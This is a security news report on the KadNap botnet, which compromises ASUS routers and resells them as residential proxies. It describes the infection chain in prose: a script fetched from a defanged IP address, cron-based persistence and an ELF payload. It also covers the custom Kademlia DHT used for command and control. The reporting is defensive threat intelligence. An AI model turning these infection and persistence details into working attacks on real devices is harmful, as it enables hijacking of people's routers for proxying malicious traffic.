A newly discovered botnet malware called KadNap is targeting ASUS routers and other edge networking devices to turn them into proxies for malicious traffic.

Since August 2025, KadNap has grown to 14,000 devices that are part of a peer-to-peer network and connect to the command-and-control (C2) infrastructure through a custom version of the Kademlia Distributed Hash Table (DHT) protocol.

This makes identifying and disrupting the C2 servers more difficult because the information is decentralized, and each node manages a subset of the complete data.

According to researchers at Black Lotus Labs, the threat research and operations arm of Lumen Technologies, nearly half of the KadNap network is connected to C2 infrastructure dedicated to ASUS-based bots, and the rest communicate with two separate control servers.

Most infected devices are located in the United States, which accounts for 60% of the total, followed by significant percentages in Taiwan, Hong Kong, and Russia.

Kademlia-based communication

A KadNap infection begins with downloading a malicious script (aic.sh) from 212.104.141[.]140, which establishes persistence via a cron job that runs every 55 minutes. The payload is an ELF binary named kad, which installs the KadNap client.

Once active, the malware determines the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to obtain the current time and system uptime.

For evasion and resistance to takedowns, KadNap uses a modified Kademlia-based DHT protocol to locate botnet nodes and the C2 infrastructure.

“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the researchers explain.

“Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists.”

The researchers discovered that KanNap’s implementation of Kademlia is undermined by a consistent connection to two specific nodes, which occurs before reaching the C2 servers. This reduces the decentralization that the protocol could achieve in ideal cases and allows identifying the control infrastructure.

Monetizing KadNap

Black Lotus Labs researchers say that the KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service, previously associated with the TheMoon malware botnet, which also targeted ASUS routers.

Doppelganger sells access to infected devices as residential proxies that can be used to funnel malicious traffic, create pseudonymization layers, and evade blocklists.

As these services are typically used to launch distributed denial-of-service (DDoS), credential stuffing, and brute-force attacks, all leading initially to KadNap victims.

Lumen has taken proactive measures against the KadNap botnet. The company says that at the time of publishing this article, it "blocked all network traffic to or from the
control infrastructure."

The disruption is only on Lumen's network, and a list of indicators of compromise will be released to help others disrupt the botnet on their end.